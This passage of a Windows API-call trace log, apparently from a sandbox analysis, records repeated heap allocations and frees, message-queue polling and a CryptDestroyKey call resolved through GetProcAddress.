wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.475] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.475] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0121.475] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.475] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.475] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.476] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.476] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.476] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.476] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.476] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.476] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.476] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.476] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.476] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.476] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x14bd5e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0121.477] GetProcAddress (hModule=0x77820000, lpProcName="CryptDestroyKey") returned 0x77840400 [0121.477] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff190 [0121.477] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef980 [0121.477] CryptDestroyKey (hKey=0x1458c18) returned 1 [0121.478] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef960 [0121.478] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x133c8a0 [0121.478] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0121.478] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0121.478] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0121.478] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0121.478] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0121.478] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0121.478] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0121.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0121.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8d0 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff000 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bde98 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3e8 | out: hHeap=0x12c0000) returned 1 [0121.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c448 | out: hHeap=0x12c0000) returned 1 [0121.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0121.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.481] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.481] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0121.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0121.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0121.482] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.482] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.483] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.483] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.483] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.483] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0121.484] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.484] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef910 [0121.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef910 | out: hHeap=0x12c0000) returned 1 [0121.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.484] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.485] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9c0 [0121.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0121.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0121.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.485] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.485] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef950 [0121.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0121.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.485] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.485] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.486] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.486] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.486] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.486] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.486] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.486] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa00 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.486] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.486] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0121.486] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0121.486] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.486] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0121.486] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0121.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.487] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0121.487] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0121.487] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.487] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0121.487] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0121.487] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.487] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0121.487] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.487] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.487] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0121.487] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.487] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.487] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0121.487] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.487] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0121.487] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.487] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0121.487] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.487] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.487] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0c8 [0121.487] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9f0 [0121.488] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9f0 | out: hHeap=0x12c0000) returned 1 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa90 [0121.488] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.488] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0121.488] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.488] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0121.488] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.488] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9b0 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0121.488] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0121.488] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0121.488] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.488] RtlAllocateHeap (HeapHandle=0x12c0000, 